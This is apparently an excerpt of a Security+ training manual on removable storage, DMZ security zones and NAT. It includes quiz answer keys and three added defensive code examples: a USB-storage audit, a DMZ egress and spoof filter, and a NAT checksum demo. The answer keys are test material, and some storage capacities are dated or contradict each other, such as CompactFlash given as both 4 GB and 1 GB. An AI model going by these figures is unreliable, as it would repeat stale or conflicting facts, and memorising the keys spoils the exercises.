                     digital video cameras, digital audio recorders, PDAs, and camera cell phones. Solid-
                     state media is physically very small, yet can hold at least 2 GB of data.




                    Exhibit 10-9: Solid-state storage media

                     External flash memory readers can access a flash memory card just as if it were an
                     additional hard drive on a computer. Because the computer treats the files on the
                     memory card as if they were already on the computer, using these files is just like
                     using any other file on the computer. Removable solid-state storage media can be used
                     with devices, or drives, that are either internal or external. These devices communicate
                     with the computer through interfaces in the form of cables and connectors that connect
                     the device to the CPU or the motherboard.
                    Because there are no moving parts to break, solid-state media is more reliable and
                    durable than conventional hard disk drives. It requires no battery to retain its data. Many
                    other devices such as wireless phones and personal digital assistants (PDAs) also use
                    solid-state media for storage.
                    There currently are several popular types of solid-state media, including CompactFlash,
                    SmartMedia, memory sticks, and secure digital/multimedia cards.

                    CompactFlash
                     The CompactFlash card is a very small type of storage, measuring only 1.7 inches by
                     1.4 inches, and less than 1/4 inch thick. It weighs a mere half-ounce. Even with
                     this small size, a CompactFlash card currently can store up to 4 GB of data. Many
                     digital devices cannot handle this large storage size, so a more common storage capacity
                     is between 8 and 128 MB.

                    SmartMedia
                    The SmartMedia card is similar to the CompactFlash, but is even thinner and lighter.
                    Many devices use SmartMedia cards, including digital still cameras, MP3 recorders, and
                    newer printing devices. These cards can store only up to 64 MB of data, unlike
                    CompactFlash cards, which can store up to 1 GB. However, SmartMedia cards are less
                    expensive than CompactFlash cards. Like the CompactFlash cards, SmartMedia cards
                    have a high data transfer rate and are resistant to extreme weather conditions.

Memory Stick
Another popular type of removable data storage is the Memory Stick. About the size of
a stick of chewing gum, the Memory Stick can hold up to 8 GB of data. Memory Sticks
are commonly used with digital still cameras, digital music players (MP3), digital voice
recorders, and other digital devices. Memory Sticks share some features with the
CompactFlash card and the SmartMedia card, including a high data transfer rate,
resistance to extreme temperatures, and high storage capacity.

Secure digital/multimedia cards
Secure digital/multimedia cards are primarily used in MP3 players and digital cameras.
These SD/MMC memory cards are about the same size as SmartMedia cards, but
thicker and have their own controller like CompactFlash cards. These cards can store up
to 8 GB.

Flash memory drives
USB flash memory drives can be plugged into any USB port, and files can then be copied
to or from the computer or network. This can lead to unwanted files being introduced to
the computer or network. It can also result in theft of files from the computer or
network. Some of these devices are also bootable, which can lead to additional security
problems such as the introduction of viruses.
In some school and business settings, the ability to use devices such as removable flash
drives is disabled: if one of these drives is plugged in, it is detected but is not made
available to the user. This prevents the introduction of viruses to the network. Some
companies also prohibit their use altogether, since these small devices can be easily
concealed and used to steal information from the business.
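The following script is an added example, not part of the course manual: it audits whether a Windows host blocks removable USB storage, the control described above, and can apply the classic setting. It assumes an elevated PowerShell session and reads two real registry locations: the USBSTOR driver's Start value (4 = disabled, so USB disk drives are never made available) and the Removable Storage Access policy value Deny_All used by newer Windows versions.

```powershell
# Added example; not from the course manual. Assumes an elevated PowerShell session.
$UsbStorKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\USBSTOR'
$PolicyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\RemovableStorageDevices'

function Get-RemovableStorageStatus {
    # Returns one object summarising both controls; RemovableBlocked is $true if
    # either one is in force. Missing values read as $null (control not set).
    $start   = (Get-ItemProperty -Path $UsbStorKey -Name Start    -ErrorAction SilentlyContinue).Start
    $denyAll = (Get-ItemProperty -Path $PolicyKey  -Name Deny_All -ErrorAction SilentlyContinue).Deny_All
    [pscustomobject]@{
        UsbStorStart     = $start            # 3 = loaded on demand (default), 4 = disabled
        UsbStorDisabled  = ($start -eq 4)
        PolicyDenyAll    = ($denyAll -eq 1)
        RemovableBlocked = ($start -eq 4) -or ($denyAll -eq 1)
    }
}

function Disable-UsbStorage {
    # Sets USBSTOR Start=4 so the mass-storage driver is not loaded for new devices.
    # Supports -WhatIf so the change can be previewed before it is applied.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($UsbStorKey, 'Set Start=4 (disable USB mass storage driver)')) {
        Set-ItemProperty -Path $UsbStorKey -Name Start -Value 4 -Type DWord
    }
}

$status = Get-RemovableStorageStatus
$status | Format-List
if (-not $status.RemovableBlocked) {
    Write-Warning 'Removable USB storage is allowed on this host; run Disable-UsbStorage -WhatIf to preview the fix.'
}
```

The USBSTOR setting covers USB mass-storage class devices only, so a host that also needs to refuse other removable storage classes should rely on the policy value as well.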

Catastrophic loss
When dealing with the various types of storage media, it is important to try to mitigate
the risk of a catastrophic loss of data. The simplest way to do this is to make backup
copies of any sensitive information and store the copies in a safe place. Information that
is so vital that business operations could be threatened if it were lost should be stored at a
separate, secure location, preferably in a fire safe. It is also very important to use a type
of media that is less likely to be corrupted or damaged, with solid-state media being the
best choice in this instance. Magnetic media is very easily damaged or erased, and
optical media is easily scratched and made unreadable.

Encryption
To guarantee that sensitive information does not fall into the wrong hands, any
organization should implement a thorough encryption policy. At no time should
business-critical information be stored in an unencrypted fashion. All of the media
discussed above are compatible with encryption technologies. The key to a successful
encryption policy is to educate the entire organization as to the importance of
safeguarding sensitive data. If one person takes a floppy disk off-site with unencrypted
data, the entire company has been compromised.

                    Storing and destruction of media
                    Once data has been transferred to some type of storage media, it is important to have a
                    policy that tracks the content of each disk and where it is located. The medium itself
                    should be well marked with a standardized naming scheme to avoid confusion. As part
                    of the policy, a clear and concise reporting structure should be implemented to account
                    for any missing storage media. All copies should be kept in a secure location until they
                    are no longer needed.
                    Once the data has become obsolete (the timeframe varies by organization), it is
                    necessary to dispose of the media appropriately. This can be done by physically
                    destroying the media, thereby rendering it unreadable, or by merely erasing the data if it
                    is on a medium that is erasable.
                    Note: A crafty hacker need only go through a company’s dumpster to likely find all
                    types of data from floppy disks, old tape, even hard disks from servers that are no longer
                    needed or were damaged. Keep in mind that just because a disk drive dies does not
                    mean the data cannot be recovered. A strong policy that ensures the complete
                    destruction of all discarded storage media should be in place and followed.

Do it!              B-1:     Discussing storage media
                     Questions and answers
                      1 The most common size for floppy disks today is:
                         A      3.5 inches
                         B      5.25 inches
                         C      8 inches
                         D      12 inches

                      2 A(n) ___________ detects the changing pattern of reflected light from the bumps
                        in the aluminum coating on a CD.
                         A      magnetic field
                         B      optoelectronic sensor
                         C      infrared beam
                         D      disk texture sensor

                      3 Smart Media is an example of solid-state storage media. True or false?

                         True


Unit summary: Transmission and storage media
Topic A   In this topic, you learned about the various types of transmission media used in
          network communications. You examined the advantages and disadvantages of each type
          and learned how to harden the physical layer of the OSI model to protect against
          intrusion.
Topic B   In this topic, you learned about the various types of storage media used to store data.
          You identified the characteristics of each medium. Finally, you learned how to properly
          store data and, when it is no longer usable, destroy it.

          Review questions
           1 Describe coaxial cable construction.
              It is composed of a single wire conductor surrounded by an insulating material, which in turn is
              surrounded by a braided metal shield.

           2 Fill in the answers below

             RG       Ohms    Typically used for
             RG-8     50      Ethernet network LAN backbone
             RG-58    50      Ethernet networks
             RG-59    75      Cable TV and cable modems


           3 Describe twisted pair cable.
               Individual wires are twisted together to prevent crosstalk between pairs and to reduce the effects
               of EMI and RFI.

           4 What is the difference between UTP and STP cable?
              STP includes an extra foil shield that is wrapped between the copper pairs to provide additional
              protection from EMI.

           5 Cat 5 twisted pair cables support 1000 Mbps Ethernet. True or False?
              False. Cat 5 supports 100 Mbps. Cat 6 supports 1000 Mbps.

           6 Fiber optic cable is more susceptible to damage than coax or twisted pair cable.
             True or False?
              True

           7 What are the advantages of using fiber optic cable?
              Very high bandwidth, EMI immunity, long distances.

           8 List potential damage that can be caused by altering data flows on the network.
              Data corruption, sabotage of core business plans, impersonation of corporate nodes to gain
              network access.

                     9 What is war driving?
                       Using a laptop’s wireless network interface card set in promiscuous mode to pick up unsecured
                       wireless signals; usually carried out by driving around with a laptop to locate the signals.

                    10 List the three major types of storage media.
                       Magnetic, optical, and solid-state.

                    11 List examples of storage devices that use a metal oxide coating.
                       Floppy disks, hard drives, cartridge drives, tape drives.

                    12 List examples of storage media that use light and reflection to transmit data.
                       CD-ROM, CD-R, CD-RW, and DVD.

                    13 What is a potential drawback to allowing users to use flash memory drives?
                       This can lead to unwanted files being introduced to the computer or network. It can also result in
                       theft of files from the computer or network. Some of these devices are also bootable which can
                       lead to additional security problems such as the introduction of viruses.

                    14 If one person takes a floppy disk off-site with unencrypted data, the entire company
                       has been compromised. True or False?
                       True

                    15 How should data be disposed of?
                       By physically destroying the media or erasing the data, depending on the level of security
                       required.
                                                Transmission and storage media   10–21

Independent practice activity
An advanced feature of NTFS is the ability to encrypt files and folders. Unlike most
encryption programs, NTFS encryption is transparent to the user. This is especially
useful for users who are not concerned with learning the details behind the operating
system, but who simply want to create data, encrypt it, and move on. The disadvantage
of transparent encryption, however, is that while users are not burdened with knowing
which data is encrypted, neither are they notified when data is decrypted, which
opens a potential security hole. After completing this activity, you’ll be able to
encrypt a file on an NTFS partition and remove the encryption by copying the file to a
floppy disk.
Note: Students should have computers running Windows Server 2003 server with an
NTFS partition and a floppy disk inserted into the floppy drive.
 1 Using Windows Explorer, navigate to C:\Documents and Settings\Administrator.
 2 Right-click the Start Menu folder and choose Properties.
 3 Click the Advanced… button.
 4 Check the Encrypt contents to secure data box.
 5 Click OK.
 6 Click OK; you’ll be asked to confirm changes.
 7 Verify that the Apply changes to this folder, subfolders and files radio button is
   selected.
 8 Click OK.
 9 Right-click the Start Menu folder and select Send To, 3½ Floppy (A).
10 When prompted about encryption, click Ignore All.
11 Once the files are copied, navigate to the floppy disk drive.
12 Right-click the Start Menu folder and choose Properties. Notice that the
   Advanced button is no longer available. The files were decrypted.


Unit 11
Network security topologies
                         Unit time: 120 minutes

                         Complete this unit, and you’ll know how to:

                         A Describe security zones and identify their
                            role in network security.

                         B Explain the features and configuration of
                            Network Address Translation (NAT).

                         C Discuss how tunneling can create a virtual
                            private network.

                         D Describe VLANs and explain their
                            significance as related to network security.


Topic A: Security topologies
                     This topic covers the following CompTIA Security+ exam objective:

                      #        Objective

                      3.3      Understand the concepts behind the following kinds of Security Topologies
                                • Security Zones
                                    • DMZ (Demilitarized Zone)
                                    • Intranet
                                    • Extranet




                     Elements of network topologies
Explanation          Security zones, NAT, tunneling, and VLANs are important elements in creating network
                     topologies to secure data and networked resources.
                            • Security zones—including demilitarized zones (DMZs), extranets and
                              intranets—are put in place using firewalls and routers on the network edge and
                              permit secure communications between the organization and third parties.
                            • Network address translation (NAT) masks the source address contained in an IP
                              packet to thwart attackers.
                            • Tunneling encrypts and encapsulates network traffic to build a secured
                              connection over a public network.
                            • Virtual local area networks (VLANs), which are deployed using network
                              switches, segment different hosts from each other on the network.
                     Each of these technologies will be examined to provide an understanding of the
                     fundamentals of security topologies.

                     Security zones
                     Any network that is connected (directly or indirectly) to your organization, but is not
                     controlled by your organization, represents a risk. To alleviate these risks, security
                     professionals create security zones, which divide the network into areas of similar levels
                     of security (trusted, semi-trusted, and untrusted). You create the security zones by
                     putting all your publicly accessed servers in one zone and restricted-access servers in
                     another, then separating both from an external network like the Internet using firewalls.
                     The three main zones into which networks are commonly divided are the intranet,
                     perimeter network, and extranet.

                     Intranet
                     The intranet is the organization’s private network; this network is fully controlled by the
                     company and is trusted. The intranet typically contains confidential or proprietary
                     information relevant to the company and, consequently, restricts access to internal
                     employees only. The private internal LAN(s) are protected from other security zones by
                     one or more firewalls, which restrict incoming traffic from both the public and DMZ
                     zones.

                        As an additional safeguard to prevent intrusion, intranets use private address spaces.
                        These IP addresses are reserved for private use by any internal network and are not
                        routable on the Internet. The following address ranges are reserved:
                            • Class A       10.0.0.0 – 10.255.255.255
                            • Class B       172.16.0.0 – 172.31.255.255
                            • Class C       192.168.0.0 – 192.168.255.255
                        Additional security measures include:
                            • Installing anti-virus software
                            • Removing unnecessary services from mission-critical servers
                            • Auditing the critical systems configurations and resources

                        DMZ
                        Demilitarized zones are semi-trusted networks that are owned and controlled by the
                        company, but have a lower level of security than the intranet. (The term comes from the
                        geographic buffer zone that was set up between North Korea and South Korea following
                        the UN “police action” in the early 1950s.) DMZs are commonly used by companies
                        that want to host their own Internet services, while preventing access to their internal
                        networks.

                        The DMZ is typically a network segment consisting of a combination of firewalls,
                        bastion hosts, and devices accessible to Internet traffic, such as proxy servers, Web
                        (HTTP) servers, FTP servers, SMTP (e-mail) servers, and DNS servers. This zone also
                        serves as a buffer zone between the Internet and the intranet.

                        Exhibit 11-1 and Exhibit 11-2 show two sample configurations for the perimeter
                        network. In Exhibit 11-1, the DMZ zone is isolated by two firewalls, one leading to the
                        Internet, the other to the intranet. This configuration protects the Web server with a
                        firewall that allows HTTP access for Web services, but restricts all other
                        protocols. A separate firewall is used to isolate the intranet from all Internet traffic. This
                        implementation of the DMZ is called a screened subnet.

Instructor note: Not all organizations require a DMZ, so explain to students that a DMZ is
necessary only if a company wishes to host its own public resources such as Web servers
and DNS servers. Many organizations host their Web server and other public servers with
a third party, thereby avoiding the necessity of a DMZ.




                        Exhibit 11-1: Three-tiered security topology

                  In Exhibit 11-2, a single firewall with three network interfaces (a three-NIC firewall)
                  provides the separation of the intranet, the DMZ, and the external network. A single
                  device protects both the perimeter network and the intranet. This configuration is
                  not as secure as that in Exhibit 11-1: a failure or compromise of the three-NIC firewall
                  can result in the compromise of the perimeter network and the intranet simultaneously.




                  Exhibit 11-2: Security zones created by three-NIC firewall

                  Internet users can access only the hosts on the DMZ. In the event that an outside user
                  penetrates the DMZ host’s security, Web pages or FTP files might be corrupted, but no
                  other company information would be exposed.

                  Filter outgoing traffic
                  Filtering traffic originating from a DMZ impairs an attacker’s ability to have a
                  vulnerable host communicate to the attacker’s host. An attacker often has the vulnerable
                  DMZ host initiate commands that open an outgoing connection from the DMZ to the
                  attacker’s host to receive more commands to run. Blocking this initial outbound
                  connection makes life harder for the attacker. Applying filtering to traffic leaving the
                  DMZ can also keep a compromised host from being used as a traffic-generating agent in
                  distributed denial-of-service attacks.
                  Assuming you know that DMZ hosts should not be initiating outbound traffic, you can
                  trigger an intrusion detection alarm to notify you whenever the rule is engaged.
                  Likewise, because you know what traffic should originate on your hosts, you can
                  construct filters that notify you when someone tries to initiate traffic outside of what is
                  expected. This is a key principle in constructing intrusion detection alarms and can be a
                  highly effective method of notifying you when your host has been compromised.
                  The most basic method of limiting outbound traffic is to construct a firewall rule or
                  router filter that specifically drops traffic initiated from devices on the DMZ network
                  interface to the Internet.

Filter incoming traffic
Another good candidate for filtering is traffic coming in on the DMZ interface of the
firewall or router that appears to have a source IP address on a network other than the
DMZ network number. Such traffic generally represents spoofed traffic, which is often
associated with denial-of-service attacks. When dropping this kind of traffic, the
firewall or router should be configured to generate a log message or rule alert so that
notification of a potential system compromise can be sent to the appropriate
administrator.
A solid understanding of what kind of network traffic is expected to be generated is
essential for this kind of configuration to work. The key is to limit traffic to only
authorized access. Remember that several common protocols, such as FTP and DNS,
initiate outbound connections. Special consideration should be given to these kinds of
protocols. Applying these recommendations can make an attacker’s job much more
difficult and provide an administrator early notification when a host has been
compromised.
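The two filtering rules above (drop and alarm when a DMZ host initiates an unexpected outbound connection; drop and alarm when a packet arriving on the DMZ interface carries a non-DMZ source address) can be expressed as a small rule evaluator run over flow records. The following Python block is an added example, not code from the manual: the DMZ network number (192.0.2.0/24), the intranet (10.0.0.0/8), the list of DMZ services allowed to initiate outbound connections, and the sample flow records are all constructed for illustration. It also goes one step beyond the text by applying the same spoofing logic on the external interface, dropping packets that claim a private (RFC 1918) source address, which the text notes are not routable on the Internet.

```python
"""
Added example (not from the manual): a toy edge filter that applies the DMZ
filtering rules described above to constructed flow records and reports the
alerts an administrator would expect to be logged. Addressing is constructed
from the RFC 5737 documentation ranges; the "allowed egress" list is an
assumption about which DMZ services legitimately initiate outbound connections.
"""
import ipaddress
from dataclasses import dataclass

DMZ_NET = ipaddress.ip_network("192.0.2.0/24")      # constructed DMZ network number
INTRANET_NET = ipaddress.ip_network("10.0.0.0/8")   # private internal LAN (RFC 1918)
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# DMZ services that are expected to initiate connections outbound
# (assumption: a DNS server and an SMTP relay live on the DMZ).
ALLOWED_DMZ_EGRESS = {
    ("192.0.2.53", "udp", 53),   # DNS server forwarding queries upstream
    ("192.0.2.25", "tcp", 25),   # mail relay delivering outbound SMTP
}


@dataclass(frozen=True)
class Flow:
    iface: str    # interface the packet arrived on: "dmz", "inet" or "intranet"
    src: str
    dst: str
    proto: str
    dport: int
    new: bool     # True for the first packet of a connection (TCP SYN / new UDP flow)


def zone_of(addr):
    """Classify an address by the security zone it belongs to."""
    ip = ipaddress.ip_address(addr)
    if ip in DMZ_NET:
        return "dmz"
    if ip in INTRANET_NET:
        return "intranet"
    return "internet"


def evaluate(flow):
    """Return (action, reason). Every 'drop' reason is an alert candidate."""
    if flow.iface == "dmz":
        # Incoming-from-DMZ rule: a packet on the DMZ interface whose source is
        # not on the DMZ network number is spoofed.
        if zone_of(flow.src) != "dmz":
            return "drop", "spoofed-source-on-dmz-interface"
        # Outgoing rule: DMZ hosts do not initiate connections, except for the
        # few services known to need it. Return traffic of an established
        # connection is not a new flow and passes.
        if flow.new and zone_of(flow.dst) == "internet":
            if (flow.src, flow.proto, flow.dport) not in ALLOWED_DMZ_EGRESS:
                return "drop", "unexpected-dmz-egress"
        if flow.new and zone_of(flow.dst) == "intranet":
            return "drop", "dmz-to-intranet"
    elif flow.iface == "inet":
        # Generalisation of the same idea: private (RFC 1918) source addresses
        # are not routable on the Internet, so they cannot legitimately arrive
        # on the external interface.
        if any(ipaddress.ip_address(flow.src) in n for n in PRIVATE_NETS):
            return "drop", "private-source-from-internet"
    return "permit", ""


def audit(flows):
    """Run the rules over a batch of flows; return [(index, reason)] for every
    drop, i.e. the events the firewall should log and the IDS should alarm on."""
    alerts = []
    for i, flow in enumerate(flows):
        action, reason = evaluate(flow)
        if action == "drop":
            alerts.append((i, reason))
    return alerts


# Constructed sample flows (not captured traffic)
SAMPLE_FLOWS = [
    Flow("dmz", "192.0.2.80", "198.51.100.7", "tcp", 51234, False),  # web server reply
    Flow("dmz", "192.0.2.53", "203.0.113.1", "udp", 53, True),       # DNS server query
    Flow("dmz", "192.0.2.80", "203.0.113.99", "tcp", 4444, True),    # web server calling out
    Flow("dmz", "10.0.0.5", "203.0.113.1", "tcp", 80, True),         # spoofed intranet source
    Flow("dmz", "192.0.2.80", "10.0.0.5", "tcp", 445, True),         # DMZ host into intranet
    Flow("inet", "192.168.1.9", "192.0.2.80", "tcp", 80, True),      # private source from outside
    Flow("inet", "203.0.113.5", "192.0.2.80", "tcp", 80, True),      # ordinary web visitor
]

if __name__ == "__main__":
    for idx, reason in audit(SAMPLE_FLOWS):
        f = SAMPLE_FLOWS[idx]
        print(f"ALERT {reason}: {f.src} -> {f.dst}:{f.dport}/{f.proto} on {f.iface}")
```

Running the block prints four alerts: the web server's unexpected outbound connection (the compromised-host scenario the text describes), the spoofed intranet source seen on the DMZ interface, the DMZ host trying to open a connection into the intranet, and the private source address arriving from the Internet. Only the two reply flows and the DNS server's legitimate upstream query are permitted.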

Extranet
The extranet is an extension of your private network or intranet. It allows you to share
your business information or operations with another business, such as a supplier,
vendor, partner, or customer. This is often referred to as business-to-business (B2B)
communications or networks because one company uses the internal resources and
services of another.
An extranet requires security and privacy. These are accomplished through firewall
management, the issuance and use of digital certificates or similar means of user
authentication, encryption of messages, and the use of VPNs that tunnel through the
public network.
Companies can use an extranet to:
    • Exchange large volumes of data using Electronic Data Interchange (EDI).
    • Share product catalogs exclusively with wholesalers or those in the trade.
    • Collaborate with other companies on joint development efforts.
    • Jointly develop and use training programs with other companies.
    • Provide or access services provided by one company to a group of other
      companies, such as an online banking application managed by one company on
      behalf of affiliated banks.
    • Share news of common interest exclusively with partner companies.

Do it!              A-1:      Understanding security zones
                      Questions and answers
                       1 How do you create a security zone?

                          Put all your publicly accessed servers in a DMZ zone and restricted-access servers in an
                          intranet zone, then separate both using a firewall. Use an additional firewall or NIC installed
                          on a firewall to isolate the DMZ from the Internet.

                       2 A demilitarized zone (DMZ) is used by a company that wants to host its own
                         Internet services while preventing access to its private network. True or false?

                          True

                       3 The DMZ is the most insecure area of your network infrastructure. What hardware
                         is reserved for this area? (Choose all that apply.)
                          A      Print servers
                          B      Firewalls
                          C      Public Internet servers, such as HTTP, FTP, and Gopher servers
                          D      Mail servers

                       4 How are security and confidentiality maintained on an extranet?

                          These are accomplished through firewall management, the issuance and use of digital
                          certificates or similar means of user authentication, encryption of messages, and the use of
                          VPNs that tunnel through the public network.

                       5 List three rules that the DMZ firewall should include.

                          Answers may include:
                          • Filter traffic originating from a DMZ.
                          • Construct filters that notify you when someone tries to initiate traffic outside of what is
                              expected.
                          • Specifically drop traffic initiated from devices on the DMZ network interface to the
                              Internet.
                          • Filter the traffic coming in from the DMZ interface of the firewall or router that appears to
                              have a source IP address of a network other than the DMZ network number.
                          • Block all ports except for required services.


Topic B: Network Address Translation
              This topic covers the following CompTIA Security+ exam objective:

               #        Objective

               3.3      Understand the concepts behind the following kinds of Security Topologies
                         • NAT (Network Address Translation)




              NAT
Explanation   Network Address Translation (NAT) is a service that converts internal private IP
              addresses to public Internet addresses. Private addresses are not routable and are not
              directly accessible from the Internet. NAT was originally developed as an interim
              solution to tackle IPv4 address depletion by allowing globally registered IP addresses to
              be reused or shared by several hosts. The “classic” NAT defined by RFC 1631 maps IP
              addresses from one realm to another. A more recent definition of NAT is found in RFC
              3022.
              NAT serves two main purposes:
                     • It provides a type of firewall by hiding internal IP addresses.
                     • It enables a company to use more internal IP addresses. Because they’re only
                       used internally, there’s no possibility of conflict with IP addresses used by other
                       companies and organizations.
              Although it can be used to translate between any two address realms, NAT is most often
              used to map IPs from the private address spaces defined by RFC 1918, as shown here:
                     Class       Private Address Range
                     A           10.0.0.0 … 10.255.255.255
                     B           172.16.0.0 … 172.31.255.255
                     C           192.168.0.0 … 192.168.255.255
              These addresses were reserved for use by private networks. Enterprises can freely use
              these addresses to avoid obtaining registered public addresses. Because private
              addresses can be reused by other organizations, they are not unique and are nonroutable
              over a common infrastructure. When communication between a privately addressed host
              and a public network (such as the Internet) is needed, address translation is required.
              This is where NAT comes in.
              NAT routers sit on the border between private and public networks, converting private
              addresses in each IP packet into legally registered public ones. They also provide
              transparent packet forwarding between addressing realms. The packet sender and
              receiver (should) remain unaware that NAT is taking place. Today, NAT is commonly
              supported by WAN access routers and firewalls situated at the network edge.

                          Static NAT
                          NAT works by creating bindings between addresses. In the simplest case, a one-to-one
                          mapping might be defined between public and private addresses. Known as static NAT,
                          this can be accomplished by a straightforward, stateless implementation that transforms
                          only the network part of the address, leaving the host part intact. The payload of the
                          packet must also be considered during the translation process. The IP checksum must, of
                          course, be recalculated. Because TCP checksums are computed from a pseudo-header
                          containing source and destination IP address (attached to the TCP payload), NAT must
                          also regenerate the TCP checksum.
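To see why the static NAT step must regenerate both checksums, the following added Python example (not code from the manual) builds a constructed IPv4/TCP packet, performs a stateless static NAT rewrite of the network part of the source address while keeping the host part, and validates the IP header checksum and the pseudo-header-based TCP checksum before and after. The addresses (10.1.2.0/24 inside, 203.0.113.0/24 outside, 198.51.100.10 as the destination) are constructed from the RFC 1918 and RFC 5737 ranges.

```python
"""
Added example (not from the manual): static NAT on a constructed IPv4/TCP
packet, showing that a rewrite of the source address invalidates both the IP
header checksum and the TCP checksum (whose pseudo-header contains the
addresses), so a NAT device must recompute both.
"""
import ipaddress
import socket
import struct


def ones_complement_sum(data):
    """16-bit one's-complement sum used by the IP and TCP checksums."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data):
    return (~ones_complement_sum(data)) & 0xFFFF


def pseudo_header(src_ip, dst_ip, tcp_len):
    """The pseudo-header the TCP checksum covers: addresses, zero, protocol 6, length."""
    return socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, 6, tcp_len)


def build_packet(src_ip, dst_ip, sport, dport, payload=b""):
    """Minimal IPv4 header + TCP SYN segment with both checksums filled in."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1000, 0, 5 << 4, 0x02, 8192, 0, 0) + payload
    tcp_sum = checksum(pseudo_header(src_ip, dst_ip, len(tcp)) + tcp)
    tcp = tcp[:16] + struct.pack("!H", tcp_sum) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def source_ip(packet):
    return socket.inet_ntoa(packet[12:16])


def verify(packet):
    """True when the IP header checksum and the TCP checksum both validate."""
    ip, tcp = packet[:20], packet[20:]
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    ip_ok = ones_complement_sum(ip) == 0xFFFF
    tcp_ok = ones_complement_sum(pseudo_header(src, dst, len(tcp)) + tcp) == 0xFFFF
    return ip_ok and tcp_ok


def static_nat(packet, inside_net, outside_net):
    """Stateless static NAT: swap the network part of the source address for the
    public network, keep the host part intact, and regenerate both checksums."""
    inside = ipaddress.ip_network(inside_net)
    outside = ipaddress.ip_network(outside_net)
    ip, tcp = packet[:20], packet[20:]
    src = ipaddress.ip_address(ip[12:16])
    if src not in inside:
        raise ValueError("source is not in the inside network")
    host_part = int(src) & int(inside.hostmask)
    new_src = ipaddress.ip_address(int(outside.network_address) | host_part)
    # Rewrite the source, zero the IP checksum field, then recompute it
    new_ip = ip[:10] + b"\x00\x00" + new_src.packed + ip[16:]
    new_ip = new_ip[:10] + struct.pack("!H", checksum(new_ip)) + new_ip[12:]
    # The pseudo-header changed too, so the TCP checksum must be regenerated
    dst = socket.inet_ntoa(ip[16:20])
    tcp_zeroed = tcp[:16] + b"\x00\x00" + tcp[18:]
    new_sum = checksum(pseudo_header(str(new_src), dst, len(tcp)) + tcp_zeroed)
    new_tcp = tcp[:16] + struct.pack("!H", new_sum) + tcp[18:]
    return new_ip + new_tcp


def naive_rewrite(packet, new_src_ip):
    """What a NAT that forgot the checksums would emit (for comparison only)."""
    return packet[:12] + socket.inet_aton(new_src_ip) + packet[16:]


if __name__ == "__main__":
    pkt = build_packet("10.1.2.3", "198.51.100.10", 40000, 80, b"GET / HTTP/1.0\r\n\r\n")
    print("original valid:", verify(pkt))
    print("naive rewrite valid:", verify(naive_rewrite(pkt, "203.0.113.3")))
    out = static_nat(pkt, "10.1.2.0/24", "203.0.113.0/24")
    print("after static NAT:", source_ip(out), "valid:", verify(out))
```

The naive rewrite produces a packet that every receiving host would discard, since both checksums fail; the full translation keeps the host part (.3), the TCP ports and the payload untouched and passes both checks.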

                          Dynamic NAT
                          More often, a pool of public IP addresses is shared by an entire private IP subnet in a
                          form of NAT called dynamic NAT. Edge devices that run dynamic NAT create bindings
                          “on the fly” by building a NAT table. Connections initiated by private hosts are
                          assigned a public address from a pool. As long as the private host has an outgoing
                          connection, it can be reached by incoming packets sent to this public address. After the
                          connection is terminated (or a timeout is reached), the binding expires, and the address
                          is returned to the pool for reuse.
                          Dynamic NAT is more complex because state must be maintained, and connections
                          must be rejected when the pool is exhausted. However, unlike static NAT, dynamic
                          NAT enables address reuse, reducing the demand for legally registered public addresses.
                          The potential problem with dynamic NAT (or static NAT for that matter) is that it has
                          fewer public addresses than inside hosts. If you have 254 public addresses, for example
                          (a class C network), you might assign 3 or 4 of those to static devices, like Web servers
                          and DNS servers. That leaves 250 addresses for dynamic NAT. But what if your
                          organization has 500 hosts? If more than 250 want to use the Internet at the same time,
                          you will run out of public addresses. The solution? PAT.

                           Port Address Translation (PAT)
                           A variation of dynamic NAT, known as Port Address Translation (PAT), might be used
                           to allow many hosts to share a single IP address by multiplexing streams differentiated
                           by TCP/UDP port numbers. For example, suppose private hosts 192.168.0.2 and
                           192.168.0.3 both send packets from source port 1108. A PAT router might translate
                           these to a single public IP address 206.245.160.1 and two different source ports, say
                           61001 and 61002. Response traffic received for port 61001 is routed back to
                           192.168.0.2:1108, while port 61002 traffic is routed back to 192.168.0.3:1108.

Instructor note: Since a port number is 16 bits long, this has the potential for a single
IP address to serve as many as 65,536 different hosts.

                           PAT is commonly implemented on Small Office/Home Office (SOHO) routers to
                           enable shared Internet access for an entire LAN through a single public address.
                           Because PAT maps individual ports, it is not possible to “reverse map” incoming
                           connections for other ports unless another table is configured. A virtual server table can
                           make a server on a privately addressed DMZ reachable from the Internet via the public
                           address of the PAT router (one server per port). This is really a limited form of static
                           NAT, applied to incoming requests.

In some cases, static NAT, dynamic NAT, PAT, and even bi-directional NAT or PAT
might be used together. For example, an enterprise might locate public Web servers
outside of the firewall on a DMZ, while placing a mail server and clients on the private
inside network, behind a NAT firewall. Furthermore, suppose there are applications
within the private network that periodically connect to the Internet for long periods. In
this case:
    • Web servers can be reached from the Internet without NAT, because they live in
      public address space.
    • Simple Mail Transfer Protocol (SMTP) sent to the private mail server from the
      Internet requires incoming translation. Because this server must be continuously
      accessible through a public address associated with its Domain Name System
      (DNS) entry, the mail server requires static mapping (either a limited-purpose
      virtual server table or static NAT).
    • For most clients, public address sharing is usually practical through dynamically
      acquired addresses (either dynamic NAT with a correctly sized address pool, or
      PAT).
    • Applications that hold onto dynamically acquired addresses for long periods
      could exhaust a dynamic NAT address pool and block access by other clients.
      To prevent this, long-running applications might use PAT because it enables
      higher concurrency (thousands of port mappings per IP address).
